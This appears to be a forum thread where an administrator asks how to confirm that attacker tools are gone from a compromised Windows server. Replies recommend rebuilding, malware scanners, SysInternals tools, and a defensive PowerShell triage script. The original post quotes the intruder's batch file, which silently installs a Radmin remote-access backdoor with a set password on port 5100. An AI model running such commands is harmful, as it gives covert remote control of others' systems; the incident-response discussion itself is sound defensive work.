Anyone know how to remove and verify these hacking tools are gone?


Kent P. Iler

Hi,

We had a directory under c:\winnt\system32\ named OS2. It had a bunch of
files like:
ndde.exe, nbthlp.exe, lssvc.exe, list.exe.

There looks like there was also a batch file with these commands in it:

regedit /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:Hack3d /port:5100 /save /silence
nvsvc.exe /start /silence
net start r_server

How can I check for installed services that are supposed to be running
silently? I'm concerned there are still backdoors on this server.

Thanks.

-- Kent Iler
 
The only real way is to reinstall the operating system from scratch and
harden it and your network to prevent the same from happening again. But
there are some things you can try. First, of course, is to run an antivirus
program with the latest definitions and also run a parasite detection and
removal program such as AdAware SE. Trend Micro has a great stand-alone
utility that also scans for and removes many common kinds of malware. Just download
Sysclean and the pattern file into a folder to run from. Note that it is
not unusual for an antivirus program to report nothing found when a second
opinion will find a problem. Pest Patrol is also very good at finding a LOT
of stuff on a computer such as trojans and keyboard loggers.

http://www.trendmicro.com/download/dcs.asp -- Sysclean malware detection
and removal.
http://www.trendmicro.com/download/pattern.asp -- this is updated often
http://www.microsoft.com/technet/security/chklist/w2ksvrcl.mspx -- good
tips from Microsoft on how to harden your computer.
http://www.pestpatrol.com/ -- Pest Patrol [now owned by Computer
Associates]

SysInternals provides some great free tools to help analyze your computer to
see if rogue processes are running. In particular, download TCPView, Process
Explorer, Autoruns, and PsList. TCPView will show what ports your computer is
using and the associated process/executable; Process Explorer will give much
more detailed info about processes, and if you view a process's properties it
will show the associated services and TCP/IP usage; Autoruns will show
startup programs in various places on the computer and let you disable them;
and PsList is a command-line process viewer which you should use to view
running processes locally and then from a remote computer to compare
the results. A hidden service or rootkit infection may not show when
processes are enumerated locally, but they will when shown from another
computer on the network, which you can do with PsList. If you do find a
hidden process that cannot be removed by normal means you might try scanning
the computer from another computer on the network or even with one of the free
online services. --- Steve

http://www.sysinternals.com/ntw2k/freeware/pslist.shtml -- PsList
http://www.sysinternals.com/ntw2k/source/tcpview.shtml -- TCPView and
SysInternals website.
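The checks Kent asked for (which services were installed to run silently) and the ones Steve describes (TCPView's port-to-process map, Autoruns' startup locations, and PsList's local-versus-remote process comparison) can be reproduced with built-in PowerShell from a trusted second machine. The script below is an added example written for this page, not code from the thread or from SysInternals. It assumes PowerShell 5.1 or later on both hosts, WinRM and remote performance counters reachable on the suspect server, and administrative rights there; the computer name COMPROMISED-SRV is a placeholder. The OS2 path, the r_server/nvsvc names and port 5100 come from the batch file in Kent's post; everything else in the filters is a starting point to review by hand, not a complete indicator list.

```powershell
# Added example (not from the original thread): triage a suspect Windows server
# FROM a trusted machine, mirroring the PsList / TCPView / Autoruns checks above.
# Assumptions: PowerShell 5.1+, WinRM enabled, remote performance counters
# reachable, local admin on the suspect. $Suspect is a hypothetical host name.
param([string]$Suspect = 'COMPROMISED-SRV')

# 1. Services (Kent's question): anything whose binary sits in the OS2 folder
#    from the post, carries the names the batch file created (r_server is the
#    Radmin service started by "net start r_server"), or lives outside the
#    usual OS / Program Files trees. Review the output by hand.
$services = Get-CimInstance Win32_Service -ComputerName $Suspect
$oddServices = $services | Where-Object {
    $_.PathName -match '\\OS2\\' -or
    $_.Name -match '^(r_server|nvsvc)$' -or
    $_.PathName -notmatch '^"?[A-Za-z]:\\(WINNT|Windows|Program Files)'
}
"== Services with unusual binaries or names on $Suspect =="
$oddServices | Select-Object Name, State, StartMode, StartName, PathName |
    Format-Table -AutoSize

# 2. Process list two ways (Steve's PsList comparison): as the suspect host
#    enumerates itself inside a remoting session, and as seen from here via
#    the remote performance counters, which is the same data path PsList \\host
#    uses. A PID present in the counter view but absent from the host's own
#    list is worth a close look (short-lived processes cause harmless noise,
#    so re-run a couple of times before drawing conclusions).
$localView = Invoke-Command -ComputerName $Suspect -ScriptBlock {
    Get-Process | ForEach-Object { [int]$_.Id }
}
$counterView = (Get-Counter -ComputerName $Suspect `
        -Counter '\Process(*)\ID Process').CounterSamples |
    Where-Object { $_.InstanceName -notin @('_total', 'idle') } |
    ForEach-Object { [int]$_.CookedValue }
"== PIDs visible through remote counters but not in the host's own list =="
Compare-Object -ReferenceObject $counterView -DifferenceObject $localView |
    Where-Object SideIndicator -eq '<=' |
    Select-Object -ExpandProperty InputObject

# 3. Listening TCP ports mapped to their owning process (what TCPView shows).
#    The batch file bound the Radmin server to port 5100; anything listening
#    that is not explained by the server's known role needs an owner.
"== Listening TCP ports on $Suspect with owning process =="
Invoke-Command -ComputerName $Suspect -ScriptBlock {
    Get-NetTCPConnection -State Listen | ForEach-Object {
        $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Port    = $_.LocalPort
            PID     = $_.OwningProcess
            Process = $p.ProcessName
            Path    = $p.Path
        }
    } | Sort-Object Port -Unique
} | Format-Table Port, PID, Process, Path -AutoSize

# 4. A few of the autostart locations Autoruns covers. This is a subset;
#    Autoruns itself checks far more (services, drivers, Winlogon, WMI, etc.).
"== Common Run keys on $Suspect =="
Invoke-Command -ComputerName $Suspect -ScriptBlock {
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' |
        ForEach-Object { Get-ItemProperty -Path $_ -ErrorAction SilentlyContinue }
} | Format-List
```

Run it from the clean workstation, not from the suspect server, so that the comparison in step 2 really does come from two different machines; a rootkit that hooks process enumeration on the suspect has no say over the counter data that the trusted host reads. Treat every hit as something to explain, not something to delete in place: as both replies say, once you have confirmed a backdoor the answer is to rebuild, and the output of this script is mainly useful for scoping what the attacker touched and for checking that the rebuilt host no longer shows any of it.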
 
I agree with Steven. If your server has been compromised, reinstall it from
scratch.

More info would be needed in order to figure out how this happened. Your
network needs a good firewall that blocks inbound traffic you don't want
coming in. Did you have FTP access open inbound? Do you have good antivirus
software? Auditing enabled? All servers & workstations patched with the
latest patches/hotfixes? Do you allow anyone to come in & plug in their own
laptop on your network? Etc etc etc.
 